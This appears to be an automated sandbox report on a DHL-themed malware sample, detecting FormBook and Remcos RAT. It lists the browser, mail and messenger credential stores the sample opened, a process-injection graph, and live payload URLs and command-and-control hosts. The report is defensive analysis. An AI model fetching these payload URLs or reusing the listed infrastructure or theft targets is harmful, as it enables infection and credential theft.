Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_222E2264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 19_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041739B GetVersionExW, 16_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\clip.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Tries to steal Instant Messenger accounts or passwords
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\SysWOW64\clip.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 19_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 19_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 19_2_00402DB3
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: wab.exe PID: 1496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 6624, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431984 Sample: DHL_ES567436735845755676678... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 84 jgbours284hawara01.duckdns.org 2->84 86 www.led-svitidla.eu 2->86 88 6 other IPs or domains 2->88 104 Snort IDS alert for network traffic 2->104 106 Multi AV Scanner detection for domain / URL 2->106 108 Found malware configuration 2->108 112 13 other signatures 2->112 15 wscript.exe 1 2->15         started        18 wab.exe 2->18         started        20 rundll32.exe 2->20         started        22 wab.exe 2->22         started        signatures3 110 Uses dynamic DNS services 84->110 process4 signatures5 166 VBScript performs obfuscated calls to suspicious functions 15->166 168 Suspicious powershell command line found 15->168 170 Wscript starts Powershell (via cmd or directly) 15->170 172 3 other signatures 15->172 24 powershell.exe 14 19 15->24         started        process6 dnsIp7 98 europrotectie.ro 188.212.111.134, 443, 49704 DATA-NODE-ASRO Romania 24->98 126 Suspicious powershell command line found 24->126 128 Very long command line found 24->128 130 Found suspicious powershell code related to unpacking or dynamic code loading 24->130 28 powershell.exe 17 24->28         started        31 conhost.exe 24->31         started        33 cmd.exe 1 24->33         started        signatures8 process9 signatures10 158 Suspicious powershell command line found 28->158 160 Very long command line found 28->160 162 Writes to foreign memory regions 28->162 164 Found suspicious powershell code related to unpacking or dynamic code loading 28->164 35 wab.exe 8 16 28->35         started        40 cmd.exe 1 28->40         started        process11 dnsIp12 90 jgbours284hawara01.duckdns.org 45.88.90.110, 3050, 49715, 49716 LVLT-10753US Bulgaria 35->90 92 duelvalenza.it 46.254.34.12, 443, 49713, 49714 SERVERPLAN-ASIT Italy 35->92 94 geoplugin.net 178.237.33.50, 49718, 80 ATOM86-ASATOM86NL Netherlands 35->94 80 C:\Users\user\AppData\Roaming\mvourhjs.dat, data 35->80 dropped 82 C:\Users\user\AppData\...\Sydstligstes.vbs, ASCII 35->82 dropped 120 Maps a DLL or memory area into another process 35->120 122 Installs a global keyboard hook 35->122 42 wscript.exe 1 35->42         started        45 cmd.exe 1 35->45         started        47 wab.exe 35->47         started        49 4 other processes 35->49 124 Uses cmd line tools excessively to alter registry or file data 40->124 file13 signatures14 process15 signatures16 138 Suspicious powershell command line found 42->138 140 Wscript starts Powershell (via cmd or directly) 42->140 142 Very long command line found 42->142 152 2 other signatures 42->152 51 powershell.exe 15 16 42->51         started        144 Uses cmd line tools excessively to alter registry or file data 45->144 55 reg.exe 1 1 45->55         started        57 conhost.exe 45->57         started        146 Tries to steal Instant Messenger accounts or passwords 47->146 148 Tries to steal Mail credentials (via file / registry access) 47->148 150 Tries to harvest and steal browser information (history, passwords, etc) 49->150 process17 dnsIp18 96 87.121.105.163, 49719, 49722, 80 NET1-ASBG Bulgaria 51->96 114 Suspicious powershell command line found 51->114 116 Very long command line found 51->116 59 powershell.exe 51->59         started        62 conhost.exe 51->62         started        64 cmd.exe 51->64         started        118 Creates multiple autostart registry keys 55->118 signatures19 process20 signatures21 154 Writes to foreign memory regions 59->154 156 Hides threads from debuggers 59->156 66 wab.exe 59->66         started        69 cmd.exe 59->69         started        71 wab.exe 59->71         started        process22 signatures23 100 Maps a DLL or memory area into another process 66->100 102 Hides threads from debuggers 66->102 73 qDlmBUIvkRrWNd.exe 66->73 injected 76 cmd.exe 66->76         started        process24 signatures25 132 Maps a DLL or memory area into another process 73->132 134 Found direct / indirect Syscall (likely to bypass EDR) 73->134 136 Uses cmd line tools excessively to alter registry or file data 76->136 78 conhost.exe 76->78         started        process26
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.212.111.134
 europrotectie.ro Romania
48881 DATA-NODE-ASRO false
137.220.252.40
 www.387mfyr.sbs Singapore
64050 BCPL-SGBGPNETGlobalASNSG false
87.121.105.163
 unknown Bulgaria
43561 NET1-ASBG false
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
45.88.90.110
 jgbours284hawara01.duckdns.org Bulgaria
10753 LVLT-10753US true
46.254.34.12
 duelvalenza.it Italy
52030 SERVERPLAN-ASIT false

Contacted Domains

Name IP Active
jgbours284hawara01.duckdns.org 45.88.90.110 true
www.387mfyr.sbs 137.220.252.40 true
led-svitidla.eu 37.235.104.9 true
europrotectie.ro 188.212.111.134 true
geoplugin.net 178.237.33.50 true
duelvalenza.it 46.254.34.12 true
www.duelvalenza.it unknown unknown
www.led-svitidla.eu unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://duelvalenza.it/FIPWKWOaFXJGe178.bin false
  • Avira URL Cloud: safe
 unknown
jgbours284hawara01.duckdns.org true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin false
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://europrotectie.ro/Methink1.thn false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://geoplugin.net/json.gp true
  • URL Reputation: phishing
 unknown
http://87.121.105.163/PUzAKuQ35.bin false
  • Avira URL Cloud: safe
 unknown
http://www.387mfyr.sbs/abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== false
  • Avira URL Cloud: safe
 unknown
http://87.121.105.163/Detentionen.java false
  • Avira URL Cloud: safe
 unknown